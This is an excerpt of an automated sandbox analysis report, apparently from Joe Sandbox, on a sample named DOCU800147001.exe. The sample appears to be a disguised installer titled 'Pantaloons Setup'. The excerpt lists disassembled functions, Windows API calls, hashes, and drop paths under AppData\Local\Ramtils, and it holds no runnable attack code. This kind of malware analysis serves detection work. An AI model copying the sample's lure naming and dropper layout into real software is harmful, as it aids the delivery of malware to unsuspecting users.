                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                • Instruction ID: df475e3658bf3194c7d81d82672e2126c085ec444a71cd8ce056a8dbc7516895
                                                • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                • Instruction Fuzzy Hash: DFE0B63261425AABEF10AE659C00AAB7B6CEF05261F008432BD25E2150E235E8219AA5
                                                Function 00403EB4 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageA.USER32(00010438,00000000,00000000,00000000), ref: 00403EC6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 499d621b576c19b091bc41f39921371812b2519aa52b2e9da7a6b0776abc8bab
                                                • Instruction ID: 4e2cb91dbe0d2d692b2d6efd4920526f8e19958c85e819a44f08040356fb0c65
                                                • Opcode Fuzzy Hash: 499d621b576c19b091bc41f39921371812b2519aa52b2e9da7a6b0776abc8bab
                                                • Instruction Fuzzy Hash: 4CC04C716552016BEA219B51DD49F077B586750B01F288425B214E50D1C674E411D66D
                                                Function 00403080 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DF2,000293E4), ref: 0040308E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                Function 00403E9D Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageA.USER32(00000028,?,00000001,00403CCE), ref: 00403EAB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 35a6196438d1a925b40bb9ea9467f367b5e4dbb747a92e5962faa32c49fde1e9
                                                • Instruction ID: ba241267bb6bb17dd96f019753e8ffde110831ee2db3609d4ff9709f9aeeb587
                                                • Opcode Fuzzy Hash: 35a6196438d1a925b40bb9ea9467f367b5e4dbb747a92e5962faa32c49fde1e9
                                                • Instruction Fuzzy Hash: 9DB09235985200AAEA224B00DD09F457A62A7A4702F008024B200240F0C7B200A0DB19
                                                Function 00403E8A Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(?,00403C67), ref: 00403E94
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: 55a9af0324514cff772be1897e352456f34009a7f25595ef81cb2bf9e2c159b8
                                                • Instruction ID: c344ebf8080bf58bdbcf791898ba473ebe4cebcd01df1b5cfbd91641023a3e3b
                                                • Opcode Fuzzy Hash: 55a9af0324514cff772be1897e352456f34009a7f25595ef81cb2bf9e2c159b8
                                                • Instruction Fuzzy Hash: 76A01132808002EBCB028B00EF0AC0ABF22ABA0B00B028822F200800308A320820FF0A

                                                Non-executed Functions

                                                Function 004047E2 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,000003F9), ref: 004047FA
                                                • GetDlgItem.USER32(?,00000408), ref: 00404805
                                                • GlobalAlloc.KERNEL32(00000040,00000001), ref: 0040484F
                                                • LoadBitmapA.USER32(0000006E), ref: 00404862
                                                • SetWindowLongA.USER32(?,000000FC,00404DD9), ref: 0040487B
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040488F
                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004048A1
                                                • SendMessageA.USER32(?,00001109,00000002), ref: 004048B7
                                                • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048C3
                                                • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048D5
                                                • DeleteObject.GDI32(00000000), ref: 004048D8
                                                • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404903
                                                • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 0040490F
                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049A4
                                                • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004049CF
                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049E3
                                                • GetWindowLongA.USER32(?,000000F0), ref: 00404A12
                                                • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A20
                                                • ShowWindow.USER32(?,00000005), ref: 00404A31
                                                • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B2E
                                                • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404B93
                                                • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BA8
                                                • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BCC
                                                • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404BEC
                                                • ImageList_Destroy.COMCTL32(?), ref: 00404C01
                                                • GlobalFree.KERNEL32(?), ref: 00404C11
                                                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404C8A
                                                • SendMessageA.USER32(?,00001102,?,?), ref: 00404D33
                                                • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D42
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D62
                                                • ShowWindow.USER32(?,00000000), ref: 00404DB0
                                                • GetDlgItem.USER32(?,000003FE), ref: 00404DBB
                                                • ShowWindow.USER32(00000000), ref: 00404DC2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $M$N
                                                • API String ID: 1638840714-813528018
                                                • Opcode ID: 839c033e8fe27d3679cd8475d1e02c88cf620d91a6620151f30cfcb1ed4b2a2a
                                                • Instruction ID: 37c04c0b90b062a92b087f54257bcfd02c7998473ae754967dc03ef3014ad8ed
                                                • Opcode Fuzzy Hash: 839c033e8fe27d3679cd8475d1e02c88cf620d91a6620151f30cfcb1ed4b2a2a
                                                • Instruction Fuzzy Hash: DA025CB0900249AFEB10DFA5DC45AAE7BB5FB84314F10857AF610BA2E1C7799E41CF58
                                                Function 004042A6 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 268stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,000003FB), ref: 004042F5
                                                • SetWindowTextA.USER32(00000000,?), ref: 0040431F
                                                • SHBrowseForFolderA.SHELL32(?,0079D8D0,?), ref: 004043D0
                                                • CoTaskMemFree.OLE32(00000000), ref: 004043DB
                                                • lstrcmpiA.KERNEL32(: Completed,0079E4F8), ref: 0040440D
                                                • lstrcatA.KERNEL32(?,: Completed), ref: 00404419
                                                • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040442B
                                                  • Part of subcall function 00405372: GetDlgItemTextA.USER32(?,?,00000400,00404462), ref: 00405385
                                                  • Part of subcall function 00405DE5: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\DOCU800147001.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,76233410,0040327D), ref: 00405E3D
                                                  • Part of subcall function 00405DE5: CharNextA.USER32(?,?,?,00000000), ref: 00405E4A
                                                  • Part of subcall function 00405DE5: CharNextA.USER32(?,"C:\Users\user\Desktop\DOCU800147001.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,76233410,0040327D), ref: 00405E4F
                                                  • Part of subcall function 00405DE5: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,76233410,0040327D), ref: 00405E5F
                                                • GetDiskFreeSpaceA.KERNEL32(0079D4C8,?,?,0000040F,?,0079D4C8,0079D4C8,?,00000000,0079D4C8,?,?,000003FB,?), ref: 004044E6
                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404501
                                                • SetDlgItemTextA.USER32(00000000,00000400,0079D4B8), ref: 00404587
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                • String ID: : Completed$A$C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne$error
                                                • API String ID: 2246997448-1626101678
                                                • Opcode ID: df3f8edb76b45bef1d3ab0cccb4a8e8134c01e7c5039b5caa234b4fd6d8aa4b9
                                                • Instruction ID: ee484549d64efd2eff965cea5eda3c12ecb716279ba3017c649c9a7946b17b4b
                                                • Opcode Fuzzy Hash: df3f8edb76b45bef1d3ab0cccb4a8e8134c01e7c5039b5caa234b4fd6d8aa4b9
                                                • Instruction Fuzzy Hash: 3C9183B1900218BBDF11AFA1CC41AAF77B8EF84315F54847BFA05B62D1C77C9A418B69
                                                Function 00402036 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040208C
                                                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407374,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402145
                                                Strings
                                                • C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kulds, xrefs: 004020C6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: ByteCharCreateInstanceMultiWide
                                                • String ID: C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kulds
                                                • API String ID: 123533781-2159730412
                                                • Opcode ID: e9c06b8639afc3ce6fbc241da707627943b35e80e64f2af56ff9b0831500eeae
                                                • Instruction ID: 5157e5bb901614104f2663cb9119d9abf172b2b834e28e211f1a5824c3cc141a
                                                • Opcode Fuzzy Hash: e9c06b8639afc3ce6fbc241da707627943b35e80e64f2af56ff9b0831500eeae
                                                • Instruction Fuzzy Hash: 90416AB5A00205BFCB00DFA4CD88E9D7BB6AF88314F204169F905FB2E5CA79D941DB54
                                                Function 00402647 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402656
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID:
                                                • API String ID: 1974802433-0
                                                • Opcode ID: 1f8b5703c19848bb5ebaba8291271e5e1171c225000ecf0a90b9af1573a488d8
                                                • Instruction ID: 9954a9e90a4ff8e1476aca16375cd89b929f17a4c0bf373ce54cb0035b2a7fc8
                                                • Opcode Fuzzy Hash: 1f8b5703c19848bb5ebaba8291271e5e1171c225000ecf0a90b9af1573a488d8
                                                • Instruction Fuzzy Hash: 4AF0A0725041509AD700E7A49D49AFEB368DB12324F2046BBE101B20C1D2B85942AB2E
                                                Function 00403FB1 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 205windowstringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040403C
                                                • GetDlgItem.USER32(00000000,000003E8), ref: 00404050
                                                • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040406E
                                                • GetSysColor.USER32(?), ref: 0040407F
                                                • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040408E
                                                • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040409D
                                                • lstrlenA.KERNEL32(?), ref: 004040A0
                                                • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040AF
                                                • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040C4
                                                • GetDlgItem.USER32(?,0000040A), ref: 00404126
                                                • SendMessageA.USER32(00000000), ref: 00404129
                                                • GetDlgItem.USER32(?,000003E8), ref: 00404154
                                                • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404194
                                                • LoadCursorA.USER32(00000000,00007F02), ref: 004041A3
                                                • SetCursor.USER32(00000000), ref: 004041AC
                                                • ShellExecuteA.SHELL32(0000070B,open,007A0EA0,00000000,00000000,00000001), ref: 004041BF
                                                • LoadCursorA.USER32(00000000,00007F00), ref: 004041CC
                                                • SetCursor.USER32(00000000), ref: 004041CF
                                                • SendMessageA.USER32(00000111,00000001,00000000), ref: 004041FB
                                                • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040420F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                • String ID: : Completed$N$open$|?@
                                                • API String ID: 3615053054-3247948670
                                                • Opcode ID: fee43ce551ef0b03fa8414572cca722d93e17a607ba525d10f69864d1f38e249
                                                • Instruction ID: 1aa85ca6dc080267a903cc48d2afa20b9f684c9b7acc4f3344bac945280a7f58
                                                • Opcode Fuzzy Hash: fee43ce551ef0b03fa8414572cca722d93e17a607ba525d10f69864d1f38e249
                                                • Instruction Fuzzy Hash: D061E5B1A40209BFEB109F20DD45F6A3B69FB44741F10856AFB04BA2D1C7B8E951CF99
                                                Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                Download Yara Rule
                                                APIs
                                                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextA.USER32(00000000,Pantaloons Setup,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
